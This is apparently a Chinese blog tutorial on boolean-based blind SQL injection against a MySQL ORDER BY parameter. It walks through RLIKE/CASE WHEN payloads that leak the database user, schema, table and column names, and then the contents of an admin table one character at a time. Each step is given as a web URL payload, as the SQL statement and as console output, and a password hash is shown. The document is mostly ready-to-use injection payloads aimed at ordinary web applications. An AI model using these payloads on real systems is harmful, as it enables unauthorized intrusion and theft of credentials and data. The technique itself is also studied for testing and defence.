0x00 记忆方式
select * from test order by 1 RLIKE (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)
当 1=1 为true时会返回1页面会保持不变
当 1=2 为false时页面会报错
这样就可以根据这个差异来判断是否正确
0x01 基本数据
mysql> select version();+-----------+| version() |+-----------+| 5.5.53 |+-----------+1 row in set (0.27 sec)mysql> select user();+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)mysql> select database();+------------+| database() |+------------+| test |+------------+1 row in set (0.00 sec)mysql> select * from test;+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)mysql> select * from tdb_admin;+----+----------+----------------------------------+| id | username | password |+----+----------+----------------------------------+| 1 | admin | 7fef6171469e80d32c0559f88b377245 |+----+----------+----------------------------------+1 row in set (0.00 sec)
0x02 读取数据库版本/当前连接用户/当前连接的数据库
读取不同的内容
例如:
substring(user(),1,1) = r
substring(user(),2,1) = o
web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring(user(),1,1)=’r’) THEN 1 ELSE 0x28 END)
数据库语句: select * from test order by 1 RLIKE (CASE WHEN (substring(user(),1,1)=’r’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring(user(),1,1)='r') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
猜对的情况页面会保持不变
错误的情况会爆错/页面数据变为空
0x03 猜库名
注意: LIMIT 0 修改会显示其他库名
例如:
LIMIT 0,1 修改为0 就是出1库
LIMIT 1,1 修改为1 就是出2库
// 演示数据mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;+--------------------+| schema_name |+--------------------+| information_schema |+--------------------+1 row in set (0.00 sec)
web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)=’i’) THEN 1 ELSE 0x28 END);
读取1库库名第一个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)=’i’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='i') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
读取1库库名第二个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)=’n’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)='n') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
0x04 猜表名
注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据
注意: LIMIT 0 修改会爆出不同的表名
例如:
LIMIT 0,1 修改为0 就是出1表
LIMIT 1,1 修改为1 就是出2表
// 演示数据mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;+------------+| table_name |+------------+| tdb_admin |+------------+1 row in set (0.00 sec)
web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)=’t’) THEN 1 ELSE 0x28 END)
数据库语句-读取当前库的第一张表名的第一个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)=’t’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)='t') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
数据库语句-读取当前库的第一张表名的第二个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)=’d’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)='d') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
0x05 猜字段
table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名
limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password
// 演示数据mysql> SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1;+-------------+| column_name |+-------------+| id |+-------------+1 row in set (0.00 sec)
web语句: http://www.test.com/sql.php?sort=1
猜test库 tdb_admin表的第一个字段名第一个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ limit 0,1),1,1)=’i’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),1,1)='i') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.01 sec)
猜test库 tdb_admin表的第一个字段名第二个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ limit 0,1),2,1)=’d’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.01 sec)
0x06 猜内容
注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条
mysql> SELECT username FROM test.tdb_admin limit 0,1;+----------+| username |+----------+| admin |+----------+1 row in set (0.00 sec)
web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)=’a’) THEN 1 ELSE 0x28 END);
读取某库某表某字段第一个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)=’a’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT username FROM test.tdb_admin limit 0,1),1,1)='a') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
读取某库某表某字段第二字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),2,1)=’d’) THEN 1 ELSE 0x28 END);
mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT username FROM test.tdb_admin limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | 1 | 1 || 2 | 2 | 2 | 2 || 3 | 3 | 3 | 3 |+----+------+------+---------+3 rows in set (0.00 sec)
若有收获,就点个赞吧
0 人点赞
